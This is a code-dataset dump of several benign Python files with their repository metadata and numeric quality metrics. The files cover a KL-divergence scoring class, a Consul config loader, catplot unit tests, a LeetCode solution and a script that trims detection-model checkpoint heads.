5,039
120
119
41.991667
0.706042
0.014884
0
0.018692
0
0
0.017936
0.007054
0
0
0.000806
0
0
0
null
null
0
0.084112
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bdd85f75dbf5d4102a25ebc2445a8a860dd88729
4,920
py
Python
networkunit/scores/score_kl_divergence.py
morales-gregorio/NetworkUnit
b858c3b2698fe3c0a7324ae8b8b388b74fd13c4d
[ "BSD-3-Clause" ]
8
2017-11-16T08:45:48.000Z
2021-11-29T16:51:45.000Z
networkunit/scores/score_kl_divergence.py
morales-gregorio/NetworkUnit
b858c3b2698fe3c0a7324ae8b8b388b74fd13c4d
[ "BSD-3-Clause" ]
17
2017-11-16T07:53:26.000Z
2021-05-07T10:27:34.000Z
networkunit/scores/score_kl_divergence.py
russelljjarvis/NetworkUnit
32179371d3a0ba354e6637cf4f97ba70522d4054
[ "BSD-3-Clause" ]
5
2019-03-23T00:55:33.000Z
2020-01-24T10:12:11.000Z
import numpy as np from scipy.stats import entropy import matplotlib.pyplot as plt import matplotlib.colors as colors import seaborn as sns import sciunit class kl_divergence(sciunit.Score): """ Kullback-Leibner Divergence D_KL(P||Q) Calculates the difference of two sampled distributions P and Q in form of an entropy measure. The D_KL measure is effectively the difference of the cross-entropy of the of both distribution P,Q and the entropy of P. D_KL can be interpreted as the amount of information lost when approximating P by Q. . math $$ D\mathrm{KL}(P||Q) =\sum{i} P(i) \log_2 \frac{P(i)}{Q(i)} = H(P,Q) - H(P) $$ The returned score is the symmetric version of the kl divergence . math $$ D_\mathrm{KL}(P,Q) := \frac{1}{2} \left(D_\mathrm{KL}(P|Q) + D_\mathrm{KL}(Q|P)\right)$$ Parameters ---------- kl_binsize : float Bin size of the histogram, used to calculate the KL divergence. """ score = np.nan @classmethod def compute(self, data_sample_1, data_sample_2, kl_binsize=0.005, **kwargs): # filtering out nans sample1 = np.array(data_sample_1)[np.isfinite(data_sample_1)] sample2 = np.array(data_sample_2)[np.isfinite(data_sample_2)] max_value = max([max(sample1),max(sample2)]) min_value = min([min(sample1),min(sample2)]) bins = (max_value - min_value) / kl_binsize edges = np.linspace(min_value, max_value, bins) P, edges = np.histogram(sample1, bins=edges, density=True) Q, _____ = np.histogram(sample2, bins=edges, density=True) # dx = np.diff(edges)[0] # edges = edges[:-1] # P *= dx # Q *= dx init_len = len(P) Qnot0 = np.where(Q != 0.)[0] P_non0 = P[Qnot0] Q_non0 = Q[Qnot0] Pnot0 = np.where(P_non0 != 0.)[0] Q_non0 = Q_non0[Pnot0] P_non0 = P_non0[Pnot0] final_len = len(P_non0) discard = init_len - final_len D_KL_PQ = entropy(P_non0, Q_non0, base=2) D_KL_QP = entropy(Q_non0, P_non0, base=2) D_KL = .5 * (D_KL_PQ + D_KL_QP) self.score = kl_divergence(D_KL) self.score.data_size = [len(sample1), len(sample2)] self.score.discarded_values = discard self.score.bins = len(edges)-1 return self.score @classmethod def plot(self, data_sample_1, data_sample_2, ax=None, palette=None, var_name='Measured Parameter', kl_binsize=0.005, sample_names=['observation', 'prediction'], **kwargs): if ax is None: fig, ax = plt.subplots() ax.set_ylabel('Probability Density') ax.set_xlabel(var_name) if palette is None: palette = [sns.color_palette()[0], sns.color_palette()[1]] sample1 = np.array(data_sample_1)[np.isfinite(data_sample_1)] sample2 = np.array(data_sample_2)[np.isfinite(data_sample_2)] max_value = max([max(sample1),max(sample2)]) min_value = min([min(sample1),min(sample2)]) bins = (max_value - min_value) / kl_binsize edges = np.linspace(min_value, max_value, bins) P, edges = np.histogram(sample1, bins=edges, density=True) Q, _____ = np.histogram(sample2, bins=edges, density=True) dx = np.diff(edges)[0] edges = edges[:-1] xvalues = edges + dx/2. xvalues = np.append(np.append(xvalues[0]-dx, xvalues), xvalues[-1]+dx) def secure_log(E, D): log = np.zeros_like(E) i = 0 for e, d in zip(E, D): if e == 0 or d == 0: log[i] = 0. else: log[i] = np.log(e/d) i += 1 return log diffy = .5 * (P - Q) * secure_log(P, Q.astype(float)) P = np.append(np.append(0, P), 0) Q = np.append(np.append(0, Q), 0) filly = np.append(np.append(0., diffy), 0.) ax.fill_between(xvalues, filly, 0, color='0.8', label='d/dx DKL') if palette is None: palette = [sns.color_palette()[0], sns.color_palette()[1]] ax.plot(xvalues, P, lw=2, color=palette[0], label=sample_names[0]) ax.plot(xvalues, Q, lw=2, color=palette[1], label=sample_names[1]) ax.set_xlim(xvalues[0], xvalues[-1]) ax.set_yscale('log') plt.legend() return ax @property def sort_key(self): return self.score def __str__(self): return "\n\n\033[4mKullback-Leibler-Divergence\033[0m" \ + "\n\tdatasize: {} \t {}" \ .format(self.data_size[0], self.data_size[1]) \ + "\n\tdiscarded: {}" \ .format(self.discarded_values) \ + "\n\tD_KL = {:.3f} \t bins = {}\n\n" \ .format(self.score, self.bins)
35.912409
80
0.570732
706
4,920
3.815864
0.24221
0.044543
0.024499
0.025241
0.344469
0.312546
0.301411
0.282108
0.282108
0.282108
0
0.032184
0.292683
4,920
137
81
35.912409
0.741954
0.172764
0
0.263736
0
0
0.047595
0.011273
0
0
0
0
0
1
0.054945
false
0
0.065934
0.021978
0.197802
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd862ba88395be8cb418cfab8ce408473323919
635
py
Python
kikyo/config.py
jadbin/kikyo
98d875e85a28b4141cbd6616bba3d397a4219dc9
[ "MIT" ]
null
null
null
kikyo/config.py
jadbin/kikyo
98d875e85a28b4141cbd6616bba3d397a4219dc9
[ "MIT" ]
null
null
null
kikyo/config.py
jadbin/kikyo
98d875e85a28b4141cbd6616bba3d397a4219dc9
[ "MIT" ]
null
null
null
import base64 import io import requests import yaml from kikyo import Kikyo, Settings def configure_by_consul(config_url: str, **kwargs) -> Kikyo: """从Consul拉取YAML格式的配置文件 :param config_url: 获取配置项的URL地址 """ resp = requests.get(config_url) resp.raise_for_status() settings = Settings() for data in resp.json(): v = data['Value'] if not v: continue s = base64.b64decode(v) conf: dict = yaml.safe_load(io.BytesIO(s)) if 'kikyo' in conf: settings.merge(conf['kikyo']) break settings.merge(kwargs) return Kikyo(settings)
19.84375
60
0.617323
77
635
4.987013
0.545455
0.070313
0
0
0
0
0
0
0
0
0
0.013129
0.280315
635
31
61
20.483871
0.827133
0.08189
0
0
0
0
0.026408
0
0
0
0
0
0
1
0.05
false
0
0.25
0
0.35
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd932ec045f92a204fc0462b20bc5fe9de822e1
5,077
py
Python
tests/ep_canvas_test.py
PytLab/catplot
63ad46218b17d5cdffdd026dad7d775cf4caa50b
[ "MIT" ]
35
2015-12-23T08:01:15.000Z
2021-11-03T01:34:20.000Z
tests/ep_canvas_test.py
PytLab/catplot
63ad46218b17d5cdffdd026dad7d775cf4caa50b
[ "MIT" ]
1
2015-11-25T05:52:43.000Z
2017-04-11T14:06:00.000Z
tests/ep_canvas_test.py
PytLab/catplot
63ad46218b17d5cdffdd026dad7d775cf4caa50b
[ "MIT" ]
10
2015-11-06T20:23:32.000Z
2020-05-16T19:18:38.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Test case for Energy Profle Canvas. """ import unittest import matplotlib.pyplot as plt from catplot.ep_components.ep_canvas import EPCanvas from catplot.ep_components.ep_lines import ElementaryLine from catplot.ep_components.ep_chain import EPChain class EPCanvasTest(unittest.TestCase): def setUp(self): self.maxDiff = True def test_construction_and_query(self): """ Test we can construct ElementaryLine object correctly. """ canvas = EPCanvas(margin_ratio=0.2) self.assertEqual(canvas.margin_ratio, 0.2) self.assertIsNone(canvas.figsize) self.assertIsNone(canvas.dpi) self.assertIsNone(canvas.facecolor) self.assertIsNone(canvas.edgecolor) self.assertListEqual(canvas.lines, []) self.assertListEqual(canvas.shadow_lines, []) self.assertTrue(canvas.figure) self.assertTrue(canvas.axes) # Check invalid reaction equation. self.assertRaises(ValueError, EPCanvas, margin_ratio=-0.1) plt.close(canvas.figure) def test_draw(self): """ Make sure the lines can be added without exceptions. """ canvas = EPCanvas() line = ElementaryLine([0.0, 1.3, 0.8]) canvas.add_lines([line]) canvas.draw() plt.close(canvas.figure) def test_add_species_annotations(self): """ Make sure the species annotations can be added without exceptions. """ canvas = EPCanvas() line = ElementaryLine([0.0, 1.3, 0.8], rxn_equation="CO_b + O_b <-> CO-O_2b -> CO2_g + 2*_b") canvas.add_lines([line]) canvas.add_species_annotations(line) plt.close(canvas.figure) def test_add_horizontal_auxiliary_line(self): """ Make sure the horizontal line can be added without exceptions. """ canvas = EPCanvas() line = ElementaryLine([0.0, 1.3, 0.8]) canvas.add_lines([line]) canvas.add_horizontal_auxiliary_line(line) plt.close(canvas.figure) def test_add_vertical_auxiliary_line(self): """ Make sure the vertical line can be added without exceptions. """ canvas = EPCanvas() line = ElementaryLine([0.0, 1.3, 0.8]) canvas.add_lines([line]) canvas.add_vertical_auxiliary_lines(line) plt.close(canvas.figure) def test_add_energy_annotations(self): """ Make sure the energy annotations can be added correctly. """ canvas = EPCanvas() line = ElementaryLine([0.0, 1.3, 0.8]) canvas.add_lines([line]) canvas.add_energy_annotations(line) plt.close(canvas.figure) def test_add_chain(self): """ Test energy profile chain can be added correctly to canvas. """ canvas = EPCanvas() self.assertFalse(canvas.lines) self.assertFalse(canvas.chains) l1 = ElementaryLine([0.0, 1.2, 0.6]) l2 = ElementaryLine([0.0, 1.0, 0.8]) chain = EPChain([l1, l2]) canvas.add_chain(chain) self.assertEqual(len(canvas.lines), 2) for l in canvas.lines: self.assertTrue(isinstance(l, ElementaryLine)) self.assertEqual(len(canvas.chains), 1) self.assertTrue(isinstance(canvas.chains[0], EPChain)) # Exception is expected if add the chain again. self.assertRaises(ValueError, canvas.add_chain, chain) plt.close(canvas.figure) def test_contains(self): canvas = EPCanvas() l1 = ElementaryLine([0.0, 1.2, 0.6]) l2 = ElementaryLine([0.0, 1.0, 0.8]) chain = EPChain([l1]) canvas.add_chain(chain) self.assertTrue(l1 in canvas) self.assertTrue(chain in canvas) self.assertFalse(l2 in canvas) plt.close(canvas.figure) def test_add_line(self): """ Test the line can be add to canvas correctly. """ canvas = EPCanvas() l1 = ElementaryLine([0.0, 1.2, 0.6]) canvas.add_line(l1) # Add repeat line, exception raises. self.assertRaises(ValueError, canvas.add_line, l1) plt.close(canvas.figure) def test_add_lines(self): canvas = EPCanvas() l1 = ElementaryLine([0.0, 1.2, 0.6]) l2 = ElementaryLine([0.0, 1.0, 0.8]) canvas.add_lines([l1, l2]) canvas.lines = [] self.assertRaises(ValueError, canvas.add_lines, [l1, l1]) plt.close(canvas.figure) def test_add_all_horizontal_auxiliary_lines(self): """ Make sure we can add all horizontal auxiliary lines to canvas. """ canvas = EPCanvas() l1 = ElementaryLine([0.0, 1.2, 0.6]) l2 = ElementaryLine([0.0, 1.0, 0.8]) canvas.add_lines([l1, l2]) canvas.add_all_horizontal_auxiliary_lines() plt.close(canvas.figure) if "__main__" == __name__: suite = unittest.TestLoader().loadTestsFromTestCase(EPCanvasTest) unittest.TextTestRunner(verbosity=2).run(suite)
30.769697
84
0.623203
631
5,077
4.885895
0.187005
0.011677
0.072657
0.077198
0.508271
0.378852
0.334415
0.314953
0.272138
0.242945
0
0.031957
0.26039
5,077
164
85
30.957317
0.789081
0.157179
0
0.425743
0
0
0.010921
0
0
0
0
0
0.217822
1
0.118812
false
0
0.049505
0
0.178218
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd9723808bf563a488aa0b07c42aceeac435545
458
py
Python
Leetcode/medium/bitwise-and-of-numbers-range.py
jen-sjen/data-structures-basics-leetcode
addac32974b16e0a37aa60c210ab7820b349b279
[ "MIT" ]
6
2021-07-29T03:26:20.000Z
2022-01-28T15:11:45.000Z
Leetcode/medium/bitwise-and-of-numbers-range.py
jen-sjen/data-structures-basics-leetcode
addac32974b16e0a37aa60c210ab7820b349b279
[ "MIT" ]
2
2021-09-30T09:47:23.000Z
2022-01-31T03:08:24.000Z
Leetcode/medium/bitwise-and-of-numbers-range.py
jen-sjen/data-structures-basics-leetcode
addac32974b16e0a37aa60c210ab7820b349b279
[ "MIT" ]
5
2021-08-10T06:41:11.000Z
2022-01-29T17:50:20.000Z
""" # BITWISE AND OF NUMBERS RANGE Given a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive. Example 1: Input: [5,7] Output: 4 Example 2: Input: [0,1] Output: 0 """ class Solution: def rangeBitwiseAnd(self, m: int, n: int) -> int: count = 0 while m < n: m = m >> 1 n = n >> 1 count += 1 return m << count
17.615385
117
0.508734
66
458
3.530303
0.515152
0.025751
0.103004
0
0
0
0
0
0
0
0
0.080139
0.373362
458
26
118
17.615385
0.731707
0.482533
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bddccaa847cf3d70df32c8b547be9368dbd1d908
20
py
Python
api/views/consts.py
tarikyayla/reddit_dashboard
e5ecf3349a5c9333793c3ae5375bc4a0e501a16c
[ "MIT" ]
null
null
null
api/views/consts.py
tarikyayla/reddit_dashboard
e5ecf3349a5c9333793c3ae5375bc4a0e501a16c
[ "MIT" ]
null
null
null
api/views/consts.py
tarikyayla/reddit_dashboard
e5ecf3349a5c9333793c3ae5375bc4a0e501a16c
[ "MIT" ]
1
2020-11-27T23:24:09.000Z
2020-11-27T23:24:09.000Z
GET_FROM_REDDIT = 1
10
19
0.8
4
20
3.5
1
0
0
0
0
0
0
0
0
0
0
0.058824
0.15
20
1
20
20
0.764706
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
bddd1a20f636344c19e0119a658dd15a4909a0a2
2,955
py
Python
match_rcnn/mmdetection/mmdet/pretrained_models/cocopth.py
201419/taobao-live-product-recognition
1f5de5917b43b2b58f4387a77272fc7c587a1051
[ "Apache-2.0" ]
null
null
null
match_rcnn/mmdetection/mmdet/pretrained_models/cocopth.py
201419/taobao-live-product-recognition
1f5de5917b43b2b58f4387a77272fc7c587a1051
[ "Apache-2.0" ]
null
null
null
match_rcnn/mmdetection/mmdet/pretrained_models/cocopth.py
201419/taobao-live-product-recognition
1f5de5917b43b2b58f4387a77272fc7c587a1051
[ "Apache-2.0" ]
1
2021-05-14T03:30:29.000Z
2021-05-14T03:30:29.000Z
import torch import numpy as np num_classes = 25 model_coco = torch.load(r"/media/alvinai/Documents/model/faster_rcnn_r50_fpn_1x_20190610-bf0ea559.pth") # print(model_coco) # print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape) # a = model_coco["state_dict"]["rpn_head.rpn_cls.weight"][0] # model_coco["state_dict"]["rpn_head.rpn_cls.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.weight"], 0, values=a, axis=0) # print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape) # b=model_coco["state_dict"]["rpn_head.rpn_cls.bias"][0] # model_coco["state_dict"]["rpn_head.rpn_cls.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.bias"], 0, values=b, axis=0) # print(model_coco["state_dict"]["rpn_head.rpn_cls.bias"].shape) # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][0].repeat(4,1,1,1) # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0) # # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][1] # # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0) # # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][2] # # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0) # # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][3] # # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0) # print(model_coco["state_dict"]["rpn_head.rpn_reg.weight"].shape) # d=model_coco["state_dict"]["rpn_head.rpn_reg.bias"][0].repeat(4,) # model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.bias"], 0, values=d, axis=0) # print(model_coco["state_dict"]["rpn_head.rpn_reg.bias"].shape) # # model_coco["state_dict"]["rpn_head.rpn_reg.weight"] = model_coco["state_dict"]["rpn_head.rpn_reg.weight"].repeat(2,1,1,1) # # model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = model_coco["state_dict"]["rpn_head.rpn_reg.bias"].repeat(2,) # weight model_coco["state_dict"]["bbox_head.fc_cls.weight"] = model_coco["state_dict"]["bbox_head.fc_cls.weight"][ :num_classes, :] model_coco["state_dict"]["bbox_head.fc_reg.weight"] = model_coco["state_dict"]["bbox_head.fc_reg.weight"][ :num_classes*4, :] # bias model_coco["state_dict"]["bbox_head.fc_cls.bias"] = model_coco["state_dict"]["bbox_head.fc_cls.bias"][:num_classes] model_coco["state_dict"]["bbox_head.fc_reg.bias"] = model_coco["state_dict"]["bbox_head.fc_reg.bias"][:num_classes*4] # save new model torch.save(model_coco, r"/media/alvinai/Documents/underwater/model/libra_faster_rcnn_r50_fpn_1x_cls_%d.pth" % num_classes)
75.769231
140
0.706937
494
2,955
3.878543
0.105263
0.192589
0.277662
0.356994
0.845511
0.826722
0.826722
0.826722
0.826722
0.669102
0
0.019806
0.094416
2,955
38
141
77.763158
0.696188
0.671404
0
0
0
0
0.458287
0.369299
0
0
0
0
0
1
0
false
0
0.181818
0
0.181818
0
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8